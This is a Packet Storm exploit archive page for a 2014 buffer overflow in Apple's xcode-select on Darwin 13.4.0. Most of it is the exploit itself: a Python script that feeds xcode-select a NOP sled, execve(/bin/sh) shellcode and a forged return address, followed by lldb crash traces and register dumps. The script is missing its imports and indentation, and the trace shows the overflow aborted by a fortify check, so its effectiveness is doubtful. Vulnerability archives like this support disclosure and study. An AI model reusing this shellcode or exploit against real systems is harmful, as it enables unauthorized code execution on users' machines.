exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xcode-select 13.4.0 Buffer Overflow

xcode-select 13.4.0 Buffer Overflow
Posted Sep 23, 2014
Authored by Juan Sacco

xcode-select on Darwin kernel version 13.4.0 suffers from a buffer overflow vulnerability.

tags | exploit, overflow, kernel
SHA-256 | 2cfb55fd81aab106c5b8d98a5ff07944ed05f81d33482b0074aa0884859772ad

xcode-select 13.4.0 Buffer Overflow

Change Mirror Download
# Exploit Title: xcode-select - buffer overflow
# Description: xcode-select controls the location of the developer
directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD
development tools.
# Date: Tuesday 23 2014
# Exploit Author: Juan Sacco
# Vendor Homepage: https://developer.apple.com
# Software Link: https://developer.apple.com/xcode/
# Version: 2333
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0
# CVE : None

junk = "\x90"*5631
shellcode =
"\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80"
#OSX/x86 intel - execve(/bin/sh) - 24 bytes

buffer = "\x90\x90\x90\x90"*89
eip = "\x7f\xff\x8e\x19\x98\x66"

print "# xcode-select is prone to an overflow"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"

try:
subprocess.call(["xcode-select", junk+shellcode+buffer+eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "xcode-select not found!"
else:
print "Error executing exploit"
raise

Process 5932 launched: '/usr/bin/xcode-select' (x86_64)
Process 5932 stopped
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8e199866: jae 0x7fff8e199870 ; __pthread_kill + 20
0x7fff8e199868: movq %rax, %rdi
0x7fff8e19986b: jmpq 0x7fff8e196175 ; cerror_nocancel
0x7fff8e199870: ret
(lldb)

(lldb) bt
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92
frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125
frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181
frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48
frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16
frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34
frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157
frame #8: 0x0000000100006315
libxcselect.dylib`xcselect_find_developer_contents_from_path + 116
frame #9: 0x0000000100000e75
xcode-select`___lldb_unnamed_function3$$xcode-select + 57
frame #10: 0x0000000100001562
xcode-select`___lldb_unnamed_function5$$xcode-select + 1083a

(lldb) register r -a
General Purpose Registers:
rax = 0x0000000000000000
rbx = 0x00007fff769df310 libsystem_pthread.dylib`_thread
rcx = 0x00007fff5fbfce18
rdx = 0x0000000000000000
rdi = 0x0000000000000d0b
rsi = 0x0000000000000006
rbp = 0x00007fff5fbfce40
rsp = 0x00007fff5fbfce18
r8 = 0x00000000fffffc00
r9 = 0x00007fff5fbfce00
r10 = 0x0000000008000000
r11 = 0x0000000000000206
r12 = 0x0000000000000400
r13 = 0x000000000000000e
r14 = 0x0000000000000006
r15 = 0x00007fff5fbfd120
rip = 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
rflags = 0x0000000000000206
cs = 0x0000000000000007
fs = 0x0000000000000000
gs = 0x0000000000030000
eax = 0x00000000
ebx = 0x769df310
ecx = 0x5fbfce18
edx = 0x00000000
edi = 0x00000d0b
esi = 0x00000006
ebp = 0x5fbfce40
esp = 0x5fbfce18
r8d = 0xfffffc00
r9d = 0x5fbfce00
r10d = 0x08000000
r11d = 0x00000206
r12d = 0x00000400
r13d = 0x0000000e
r14d = 0x00000006
r15d = 0x5fbfd120
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close